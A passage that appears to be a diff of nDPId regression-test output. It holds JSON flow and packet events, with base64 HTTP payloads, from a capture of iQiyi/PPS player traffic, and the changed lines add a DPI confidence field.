DQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFRSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"}
-01360{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01386{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="}
 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\/NTNlMjVlMzNlMDY0YzY1N2MwNmI1NThlNWMzYzMzZmQgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="}
-00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}}
+00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}}
 01458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"ts_msec":1467353139309,"pkt":"ABxCjnAxTF4M6gNlCABFAAMfaWMAAD0GXGrLQrYYwKhzCABQxSLUhYLF1grOxFAYAO2vKAAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jc3AtcmVzcG9uc2UNCkRhdGU6IFR1ZSwgMjggSnVuIDIwMTYgMTc6MzQ6NDkgR01UDQpFeHBpcmVzOiBTYXQsIDAyIEp1bCAyMDE2IDE3OjM0OjQ5IEdNVA0KU2VydmVyOiBvY3NwX3Jlc3BvbmRlcg0KQ29udGVudC1MZW5ndGg6IDQ2Mw0KWC1YU1MtUHJvdGVjdGlvbjogMTsgbW9kZT1ibG9jaw0KWC1GcmFtZS1PcHRpb25zOiBTQU1FT1JJR0lODQpBZ2U6IDIxNzg0OQ0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTM0NTYwMA0KDQowggHLCgEAoIIBxDCCAcAGCSsGAQUFBzABAQSCAbEwggGtMIGWohYEFErdBhYbvPZotXb1gba7Yhq6WoEvGA8yMDE2MDYyODA3MDAxN1owazBpMEEwCQYFKw4DAhoFAAQU8uBq+YWKHY1wm0kZI3qptRoofmQEFErdBhYbvPZotXb1gba7Yhq6WoEvAghGKxV5KtroM4AAGA8yMDE2MDYyODA3MDAxN1qgERgPMjAxNjA3MDUwNzAwMTdaMA0GCSqGSIb3DQEBCwUAA4IBAQBKs877cfA5B2KGhwFSvIyUBYVxkUFjApJpIKog7zezUT4uRPAvbjktL\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"ts_msec":1467353139627,"pkt":"TF4M6gNlABxCjnAxCABFAAIvA51AAIAG6DPAqHMIymwO28UlAFD7uSUWcC90rlAYAQQTNwAAR0VUIC9jb3JlP3Q9NSZhPTImcmE9MSZwZj0yMDEmcD0xMSZwMT0xMTQmcDI9MzAwMCZzZGt0cD0xJmMxPTMxJnI9NDc5NTMxMDAwJmFpZD0xODA5MzIzMDEmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9V2luZG93cyUyMDcmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMzkmaXNsb2NhbD0wJmFzPTAzMTFjNWEwZDU1OTYwNjNkYjU5NDRiZDc2YjZjYmZmJnZlPWIxZjkwZjhkYTZmZTAyNThkMTM2MTZhODA3MGNiOTk3JnBlPSZ2ZnJtPSZjaGw9JmhjZG52PTEwLjAuMC4yOTMmdHBjZD0wJmlzZHJtPTEmaHQ9MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"}
-01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 